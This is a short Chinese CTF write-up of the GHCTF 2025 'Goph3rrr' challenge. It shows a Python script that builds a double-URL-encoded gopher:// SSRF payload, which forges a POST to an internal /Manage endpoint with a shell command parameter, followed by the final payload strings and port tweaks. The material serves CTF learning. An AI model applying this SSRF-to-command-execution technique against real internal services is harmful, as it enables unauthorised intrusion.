突然兴趣来了,稍微复习一下之前写过的新生赛吧 = v =

[GHCTF 2025]Goph3rrr

考察点:Gopher协议伪造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from urllib.parse import quote

# 要执行的命令
command = "ls"  # 可替换为其他任意命令

# 构建POST请求体
request_body = f"cmd={quote(command)}"
content_length = len(request_body)

# 构建完整HTTP请求
http_request = f"""POST /Manage HTTP/1.1
Host: 0.0.0.0:5000
Content-Type: application/x-www-form-urlencoded
Content-Length: {content_length}

{request_body}"""

# 转换为gopher格式(添加前缀+替换换行符)
gopher_payload = "_" + http_request.replace("\n", "\r\n")

# 双重URL编码
encoded_payload = quote(gopher_payload, safe='')
final_url = f"gopher://0.0.0.0:5000/{encoded_payload}"                                #记住,这个gopher://0.0.0.0:5000/不应该修改

# 双重编码后的最终Payload
double_encoded_payload = quote(final_url)

print(f"最终Payload: url={double_encoded_payload}")

得到:

1
url=gopher%3A//0.0.0.0%3A5000/_POST%2520%252FManage%2520HTTP%252F1.1%250D%250AHost%253A%25200.0.0.0%253A5000%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25206%250D%250A%250D%250Acmd%253Dls

需要修改一下:

1
url=gopher://0.0.0.0:8000/_POST%2520%252FManage%2520HTTP%252F1.1%250D%250AHost%253A%25200.0.0.0%253A5000%250D%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250D%250AContent-Length%253A%25206%250D%250A%250D%250Acmd%253Dls

修改点:

1
2
3
4
#端口:
8000     5000    8080    8888

#前半部分不需要二次编码
backtop